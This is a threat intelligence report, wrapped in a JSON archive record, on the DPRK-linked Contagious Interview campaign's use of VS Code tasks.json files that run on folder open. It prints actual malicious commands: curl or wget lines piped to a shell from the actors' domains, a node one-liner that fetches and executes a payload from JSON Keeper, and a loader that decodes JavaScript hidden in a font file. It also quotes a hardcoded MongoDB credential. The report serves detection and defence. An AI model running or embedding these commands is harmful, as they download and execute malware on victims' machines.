{ "id": "f4d9582a-7b97-4005-9957-e16c8e4323f7", "created_at": "2026-04-06T00:12:35.112345Z", "updated_at": "2026-04-10T13:11:56.28949Z", "deleted_at": null, "sha1_hash": "88acd9ab76dad49f70a26ff598c9370694fb24db", "title": "Contagious Interview: Tracking the VS Code Tasks Infection Vector", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3441084, "plain_text": "Contagious Interview: Tracking the VS Code Tasks Infection\r\nVector\r\nBy Abstract Security Threat Research Organization (ASTRO)\r\nPublished: 2026-02-24 · Archived: 2026-04-05 13:52:54 UTC\r\nExecutive Summary\r\nThe DPRK-attributed Contagious Interview campaign continues to target software developers through fake\r\nrecruitment schemes disguised as technical assessments and code reviews of projects hosted on platforms like\r\nGitHub. A relatively new technique in the campaign's arsenal leverages Microsoft Visual Studio Code task files\r\n(located at .vscode/tasks.json ) to achieve malicious code execution upon project open. This report documents\r\nour observations tracking this vector, presents GitHub-based discovery methods, highlights unique findings\r\nincluding a newly published malicious Node Package Manager (NPM) package, and outlines detection\r\nopportunities for defenders.\r\nBackground\r\nRecent reporting from the security community has documented the campaign's adoption of VS Code task files as\r\nan infection vector, ultimately leading to deployment of the BeaverTail downloader and InvisibleFerret backdoor:\r\nOpen Source Malware documented various types of repos containing malicious tasks files, associated\r\n\"code puppets\", and a marked reliance on Vercel domains for payload hosting.\r\nRed Asgard published detailed C2 infrastructure analysis and some interesting results from probing the\r\ninfrastructure.\r\nSecurity Alliance (SEAL) provided a comprehensive breakdown of the attack's malware infection chain.\r\nEarlier work from NVISO documented the campaign's use of legitimate JSON storage services for payload\r\nstaging, a technique that remains in active use alongside the VS Code tasks vector.\r\nThis report builds on that foundation with additional observations from our tracking efforts.\r\nThe VS Code Tasks Vector\r\nHow It Works\r\nVisual Studio Code's Task feature allows developers to automate workflows and run tools without manual\r\ninteraction. Tasks are configured in the .vscode/tasks.json file for a workspace. The most important facilitator\r\nfor this attack vector is the configuration's runOptions property, which supports a runOn value of\r\nfolderOpen , causing the defined task to execute automatically when a workspace is opened. This is intended to\r\nstreamline developer workflows like starting build watchers, linters, or development servers when a project opens.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 1 of 22\n\nContagious Interview actors exploit this by including malicious shell commands in tasks.json files. When a victim\r\nclones a repository to their local machine and opens it in VS Code, the malicious task executes and kicks off the\r\ninfection chain leading to malware installation. Furthermore, the presentation property among others in\r\ntasks.json can be configured to hide the shell activity entirely, leaving the victim unaware that anything\r\nexecuted at all.\r\nThis image breaks down the tasks configuration properties quite well (ref. pcaversaccio):\r\nA Tiny, Tiny Silver Lining...\r\nOne might be somewhat relieved to know that tasks execution requires the victim to trust the workspace when\r\nprompted. However, this trust prompt is a single click away from compromise, and social engineering (\"please\r\nfollow the setup instructions exactly\") is often sufficient to convince targets in the context of a job interview.\r\nNotably, once a workspace is trusted the user is never prompted again, establishing persistence for malware\r\ninstallation on subsequent project opens.\r\nExample trust prompt (ref. pcaversaccio):\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 2 of 22\n\n...Demolished by Reality\r\nAdditionally, a project doesn't necessarily have to start off with malicious tasks embedded; subsequent pulls\r\ncontaining newly added malicious tasks will execute without re-prompting. An attacker who controls or gains\r\ncommit access to a previously trusted repository could push malicious changes that execute silently the next time\r\na collaborator opens the project. This extends the threat model beyond cloning unfamiliar repositories to include\r\nongoing collaboration with compromised projects.\r\nContinuity with Existing Techniques\r\nWhile the tasks.json vector is a newer addition to the campaign's toolkit and a marked move away from reliance\r\non ClickFix for initial infection, it integrates with previously documented Contagious Interview techniques:\r\nObfuscated JavaScript payloads executed via Node.js\r\nPayloads masquerading as non-JavaScript files (fonts, images, configuration files)\r\nHosting payload servers on web application platforms (Vercel, Render)\r\nStaging on JSON storage sites (JSON Keeper, JSON Silo, and npoint.io)\r\nMalicious NPM package dependencies\r\nThe tasks.json file serves as the trigger mechanism, while downstream payload delivery mirrors patterns\r\ndocumented by the research community over the past year.\r\nThe earliest public POC of this VS Code backdoor technique appears in this VS Code-Backdoor repository from\r\nresearcher SaadAhla.\r\nTracking Activity with GitHub Code Search\r\nGitHub Code search provides an effective mechanism for identifying repositories using this technique. We\r\ndeveloped several queries to surface malicious tasks.json files and track campaign activity.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 3 of 22\n\nFinding Tasks.json with Downloaders\r\nThis query identifies repositories containing tasks.json files with commands directly running curl or wget to\r\nfetch and immediately execute payloads.\r\npath:tasks.json runOn folderOpen (curl OR wget) (cmd OR \"| sh\")\r\nMost tasks cover both Windows and Unix-like platforms. Here are some command samples:\r\n\"osx\": {\r\n  \"command\": \"curl 'https://www.regioncheck.xyz/settings/mac?flag=8' | bash \u0026\u0026 nohup node\r\n.vscode/spellright.dict \u003e /dev/null 2\u003e\u00261 \u0026\"\r\n}\r\n\"linux\": {\r\n  \"command\": \"wget -qO- 'https://vscode-toolkit-bootstrap.vercel.app/settings/linux?flag=306' | sh\"\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 4 of 22\n\n}\r\n\"windows\": {\r\n  \"command\": \"curl --ssl-no-revoke -L https://vscodesettingstask.vercel.app/api/settings/windows | cmd\"\r\n}\r\nThis surfaces new repositories from known personas (puppet GitHub user accounts associated with Contagious\r\nInterview activity), identifies new personas using similar techniques, and reveals variations in implementation.\r\nHowever, it does not capture everything. Some tasks.json commands execute payloads stored elsewhere in the\r\nrepository or trigger infections through malicious package installations rather than direct downloads.\r\nAn Amusing Evasion Technique\r\nWhile reviewing search results, we noticed several tasks.json files' commands appeared empty at first glance, but\r\na horizontal scroll bar hinted at content extending beyond the visible window.\r\nScrolling right revealed the malicious commands padded with whitespace to push them far off the right edge of\r\nthe screen, presumably to hide them from cursory manual review. These are easily missed unless a user notices the\r\nhorizontal scroll bar.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 5 of 22\n\nThis example is present in https://github.com/dmbruno/card-activity, one of a few repos we observe using this\r\ntrick updated within the last month.\r\nFinding Infrastructure Beyond Vercel\r\nExisting reporting often highlights Vercel domain abuse, and for good reason as it's a consistent pattern in this\r\ncampaign evolution. However, we observe that non-Vercel domains are also used, revealed by excluding \"vercel\"\r\nfrom our search:\r\npath:tasks.json runOn folderOpen (curl OR wget) (cmd OR \"| sh\") NOT vercel\r\nThis query finds malicious tasks.json files not using Vercel domains, surfacing outliers. Note that this can include\r\nfalse positive results and should be reviewed.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 6 of 22\n\nThe search revealed the following additional payload hosting domains, all of which appear in recently created or\r\nupdated repositories as of the time of this analysis.\r\nwww[.]vscodeconfig[.]com\r\nwww[.]regioncheck[.]xyz\r\nvscode-load[.]onrender[.]com\r\nPayload Masquerading in Image, Font, and Text Files\r\nFake Spellcheck\r\nOne tasks file using regioncheck[.]xyz within repo ta3pks/Decentralized-Social shows a case of Node executing a\r\n.vscode/spellright.dict file:\r\n...\r\n\"osx\": {\r\n  \"command\": \"curl 'https://www.regioncheck.xyz/settings/mac?flag=8' | bash \u0026\u0026 nohup node\r\n.vscode/spellright.dict \u003e /dev/null 2\u003e\u00261 \u0026\"\r\n},\r\n\"linux\": {\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 7 of 22\n\n\"command\": \"wget -qO- 'https://www.regioncheck.xyz/settings/linux?flag=8' | sh\"\r\n},\r\n\"windows\": {\r\n  \"command\": \"curl https://www.regioncheck.xyz/settings/windows?flag=8 | cmd \u0026\u0026 node .vscode/spellright.dict\"\r\n}\r\n...\r\nThe spellright.dict file appears to be a dictionary for the Spell Right VS Code extension. Spoiler, it's obfuscated\r\nJavaScript. Node.js doesn't care about file extensions. It will execute JavaScript from a .dict file without\r\ncomplaint.\r\nHunting for Tasks Executing Image and Font Files\r\nThis GitHub Code search surfaces tasks.json commands using node to execute JavaScript hidden in image and\r\nfont files (add extensions as needed, or look for NOT .js to catch more variations). Again, mind the false\r\npositives in the results.\r\npath:tasks.json runOn folderOpen node (.woff OR .svg OR .jpeg OR .png)\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 8 of 22\n\nSome examples from the results:\r\n\"command\": \"node webfonts/fa-brands-regular.woff2\"\r\n\"windows\": {\r\n  \"command\": \"node src/assets/card4.jpeg\", \r\n},\r\n\"osx\": {\r\n  \"command\": \"nohup node src/assets/card4.jpeg \u003e /dev/null 2\u003e\u00261 \u0026\"\r\n}\r\n\"windows\": {\r\n  \"command\": \"node src/images/logo-red.svg\"\r\n},\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 9 of 22\n\n\"osx\": {\r\n  \"command\": \"nohup node src/images/logo-red.svg \u003e /dev/null 2\u003e\u00261 \u0026\"\r\n}\r\nThese all contain obfuscated JavaScript, such as in this webfonts/fa-brands-regular.woff2.\r\nFrom a detection perspective, commands like node webfonts/fa-brands-regular.woff2 initially seem\r\nstraightforward to catch, but there are variations to consider. For example, this sample checks for Node.js\r\navailability before execution:\r\n\"command\": \"(command -v node \u003e/dev/null 2\u003e\u00261 \u0026\u0026 node ./public/fontawesome/fa-solid-400.woff2) || (where\r\nnode \u003enul 2\u003e\u00261 \u0026\u0026 node ./public/fontawesome/fa-solid-400.woff2) || echo ''\"\r\nA Shared Pattern Leads to More Variants\r\nWe noticed that these tasks.json files often contained \"label\": \"eslint-check\" . Using that label in this search\r\nreturned the same results along with new variants.\r\npath:tasks.json runOn folderOpen \"eslint-check\"\r\nVariant 1\r\npaalgyula/react-fe-exam/.vscode/tasks.json runs JavaScript included directly in the file using node -e argument for\r\nscript evaluation.\r\n...\r\n\"label\": \"eslint-check\",\r\n\"type\": \"shell\",\r\n\"command\": \"node\",\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 10 of 22\n\n\"args\": [\r\n  \"-e\",\r\n  \"h=require('https');(async()=\u003e\r\n{try{u=Buffer.from('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9RSlpDRw==','base64')+'';d=await new\r\nPromise((r,j)=\u003e{h.get(u,s=\u003e{b='';s.on('data',c=\u003eb+=c).on('end',()=\u003er(JSON.parse(b)));}).on('error',j);});new\r\nFunction('require',Buffer.from(d.model,'base64')+'')(require);}catch(e){}})();\"\r\n]\r\n...\r\nThis downloads and executes the next stage from a JSON Keeper URL -\r\nhttps://www[.]jsonkeeper[.]com/b/QJZCG . The response content was captured using URLScan\r\nmeows://urlscan[.]io/dom/019bdb75-40cb-7548-abd5-4558496217d5/ (Warning: This is an actual malicious\r\npayload. Handle with caution.).\r\nVariant 2\r\nchocoscoding/hmmm/.vscode/tasks.json supposedly runs JavaScript from a fake CSS file. However, while this\r\nproject shares similarities with other Contagious Interview repositories, the referenced CSS file currently appears\r\nbenign.\r\n\"command\": \"node src/app/globals_light.css\"\r\nVariant 3\r\nThese tasks run JS files directly using node.\r\nTasks rheahorvath66-max/Zentrix/.vscode/tasks.json and diemlibre-finance/evm01-66-release/.vscode/tasks.json\r\nrun:\r\n\"command\": \"node server/config/conf.js\"\r\nTasks silverbusiness09/rentverse/.vscode/tasks.json and arliawhite/rentverse/.vscode/tasks.json run:\r\n\"command\": \"node server/data/util/conf.js\"\r\nThese are interesting because conf.js is used to indirectly run payloads stored in other files, somewhat less obvious\r\nthan previous cases. Take this example from diemlibre-finance/evm01-66-release/server/config/conf.js:\r\nconst fs = require('node:fs');\r\nconst path = require('node:path');\r\nconst hex = fs.readFileSync(path.join(__dirname, '../../webfonts/fa-brands-regular.woff2'), 'utf8')\r\n  .replace(/[^0-9a-f]/gi, '');\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 11 of 22\n\nconst src = Buffer.from(hex, 'hex').toString('utf8');\r\nnew Function('require','module','exports','__filename','__dirname', src)(\r\n  require,\r\n  module,\r\n  exports,\r\n  __filename,\r\n  __dirname\r\n);\r\nThis script extracts hex-encoded JavaScript from webfonts/fa-brands-regular.woff2, decodes it, and executes it\r\nusing the Function constructor. As expected the font file contains the obfuscated payload.\r\nHunting for Obfuscated Payloads Directly\r\nThe observed JavaScript obfuscation patterns can be used to hunt for similar masquerading files in GitHub Code\r\nSearch independent of tasks.json. Note that these searches return many results that aren't necessarily part of the\r\nContagious Interview campaign, so manual review is required to determine attribution.\r\nHunting hexadecimal entity names in WOFFs and SVGs\r\n(path:woff OR path:*svg) AND /[^a-zA-Z0-9]_0x[a-f0-9]{6}[=,\\(\\)\\[\\]\\{\\}]/\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 12 of 22\n\nHunting using commonly seen keywords\r\nObfuscation patterns change. Trying different search approaches such as based on commonly seen strings\r\nuncovers additional samples:\r\n(path:woff OR path:*svg) AND fromcodepoint AND length AND undefined AND push AND 0x\r\nMalicious NPM Package Installation Variant\r\nOne repository presenting itself as a \"Food Ordering Web App Technical Assessment (MERN Stack)\" takes a\r\ndifferent approach. Rather than executing payloads directly from tasks.json, it triggers NPM installation of a\r\nmalicious package dependency.\r\nThe tasks.json makes use of args like so to run npm install and start a backend server.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 13 of 22\n\nThe backend/package.json includes:\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 14 of 22\n\nThe package \"jsonwebauth\" sounds plausible, but code in backend/server.js reveals an inconsistency. The\r\njsonwebauth package is imported as dotenv and used as Express middleware. Neither makes sense for a\r\nsupposed JWT library and raises suspicion.\r\nconst express = require('express');\r\nconst dotenv = require('jsonwebauth');\r\nconst cors = require('cors');\r\nrequire('dotenv').config();\r\nconst { connectDB } = require('./config/db.js');\r\n...\r\n// app config\r\nconst app = express();\r\nconst port = 4000;\r\n// middleware\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 15 of 22\n\napp.use(express.json());\r\napp.use(cors());\r\napp.use(dotenv());\r\n// db connection\r\nconnectDB();\r\n...\r\nThe Malicious Package \"jsonwebauth\"\r\nThe jsonwebauth package on npm was published on January 8, 2026 just days prior to our analysis. The package\r\npage has inconsistencies typical of malicious packages published by the Lazarus Group for the Contagious\r\nInterview campaign.\r\nUpon cursory review in the Code tab, the lib folder weighs in at 380 kB, well above the sizes of other files and\r\nfolders.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 16 of 22\n\nWithin that the file lserver.js (326 kB) contains the malicious payload.\r\nThis package is tracked on the DPRK npm packages tracker as part of the Contagious Interview campaign.\r\nSearching GitHub for repositories using this package returns 2 additional results:\r\npath:package.json jsonwebauth\r\nBonus: Hardcoded Database Credentials\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 17 of 22\n\nThe same repository contains a MongoDB connection string with hardcoded credentials under\r\nbackend/config/db.js:\r\nmongodb+srv://dulanjalisenarathna93:E2JUb0zfaT2FVp8D[@]cluster0[.]exkxkun[.]mongodb[.]net/reactjs-food-delivery-app\r\nThe unique username dulanjalisenarathna93 itself can be used to track other repositories using the same\r\ndatabase or potentially associated with the campaign.\r\nFinding Activity Through Commit Authors\r\nMany of the personas that own malicious repositories or have committed to them can be leveraged to map out\r\nundiscovered repositories. However, their commit histories are often extensive and not always for files of interest\r\nlike tasks.json .\r\nWe've found that searching for commits from git commit authors who have no linked GitHub account tends to\r\nyield less noisy results. In these examples, we search for commit author emails associated with personas that have\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 18 of 22\n\nmade commits to tasks.json files in other malicious repositories. These return highly relevant results.\r\nauthor-email:\"Jonathan.daniel.ag1230[@]gmail[.]com\"\r\nauthor-email:\"davidexpert1233[@]hotmail[.]com\"\r\nCompare that to author-name:\"yosket\" (a deleted GitHub persona associated with many commits to Contagious\r\nInterview repositories) which returns a whopping 3.5k results.\r\nNote that these commit emails are arbitrary and cannot necessarily be used to identify real users. Rather they serve\r\nas pivot points for tracking repositories through commit histories. These emails may be throwaway or stolen\r\naddresses used only for git commits.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 19 of 22\n\nMitigations\r\nDisable automatic task execution. Set task.allowAutomaticTasks to off in VS Code user settings. This\r\nprevents tasks with runOn: folderOpen from executing without explicit user action.\r\nUse GitHub's web editor for initial review. Pressing the \".\" key on any GitHub repository opens a browser-based VS Code environment at github.dev . This environment has no shell capability, allowing safe inspection\r\nof repository contents including .vscode/tasks.json files.\r\nAvoid opening unfamiliar repositories in VS Code Desktop. Repositories received as part of job interviews or\r\ntechnical assessments carry elevated risk. If you must open such repositories in VS Code Desktop, check first in-browser for a .vscode/tasks.json file set to execute commands automatically on folder open, and do not trust\r\nthe workspace when prompted.\r\nConsider the broader attack surface. The VS Code tasks vector is one of many. From malicious npm packages\r\nto yet-unknown techniques, there are too many risks with opening unfamiliar repositories in VS Code. When\r\npossible, use sandboxed environments or browser-based tools for initial review.\r\nDetection Opportunities\r\nVS Code child process activity. Monitor for VS Code spawning child processes running curl, wget, powershell,\r\nbash, cmd, or similar utilities shortly after process start.\r\nNode.js executing non-JavaScript files. Alert on Node.js executing files with unexpected extensions such as\r\n.woff, .woff2, .svg, .jpeg, .png, .dict, .npl, or other non-JS extensions.\r\nVS Code tasks initiating requests to Vercel domains. Monitor for VS Code process starts followed closely by\r\nnetwork requests to Vercel domains.\r\nPlatform-specific URL patterns. Requests to Vercel URLs containing platform indicators in the path ( /linux,\r\n/mac, /windows ) combined with query parameters ( flag=, token= ).\r\nJSON storage and paste site access. Requests from non-browser processes to JSON storage URLs\r\n(jsonkeeper[.]com, jsonsilo[.]com, api[.]npoint[.]io) and paste sites (pastebin[.]com).\r\nConclusion\r\nThe Contagious Interview campaign's adoption of VS Code task files represents a pragmatic evolution in initial\r\naccess techniques. By exploiting a legitimate IDE feature designed for developer productivity, threat actors\r\nachieve code execution and persistence with minimal user interaction, requiring only that the victim trust a\r\nworkspace.\r\nGitHub Code Search provides an effective mechanism for tracking campaign activity, identifying new\r\nrepositories, and discovering technique variations. The queries and methodologies outlined here support ongoing\r\nmonitoring.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 20 of 22\n\nDefenders should implement the mitigations and detection opportunities outlined in this report. Developers should\r\nexercise caution when opening repositories from unfamiliar sources, particularly those presented as part of\r\nrecruitment processes.\r\nAppendix: GitHub Search Queries\r\nPurpose Query\r\nTasks.json with downloaders path:tasks.json runOn folderOpen (curl OR wget) (cmd OR \"| sh\")\r\nNon-Vercel infrastructure\r\npath:tasks.json runOn folderOpen (curl OR wget) (cmd OR \"| sh\")\r\nNOT vercel\r\nTasks executing image/font files\r\npath:tasks.json runOn folderOpen node (.woff OR .svg OR .jpeg OR\r\n.png)\r\neslint-check label pattern path:tasks.json runOn folderOpen \"eslint-check\"\r\nObfuscated JS in WOFFs/SVGs\r\n(hex naming pattern)\r\n(path:woff OR path:*svg) AND /[^a-zA-Z0-9]_0x[a-f0-9]{6}[=,\\(\\)\\[\\]\\\r\n{\\}]/\r\nObfuscated JS in WOFFs/SVGs\r\n(keyword pattern)\r\n(path:woff OR path:*svg) AND fromcodepoint AND length AND\r\nundefined AND push AND 0x\r\nMalicious jsonwebauth package path:package.json jsonwebauth\r\nCommits by author email example author-email:\"davidexpert1233[@]hotmail[.]com\"\r\nAppendix: Indicators\r\nNote: Abstract customers with the Intel Gallery enabled already have access to these indicators.\r\nDomains\r\nView 29 Rows\r\nCommit Author Emails\r\nView 57 Rows\r\nGitHub Personas\r\nView 143 Rows\r\nAssociated Repositories\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 21 of 22\n\nView 137 Rows\r\nMalicious Packages\r\nPackage Registry Published\r\njsonwebauth npm January 8, 2026\r\nOther Identifiers\r\nMongoDB Username\r\ndulanjalisenarathna93\r\nSource: https://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 22 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector" ], "report_names": [ "contagious-interview-tracking-the-vs-code-tasks-infection-vector" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", 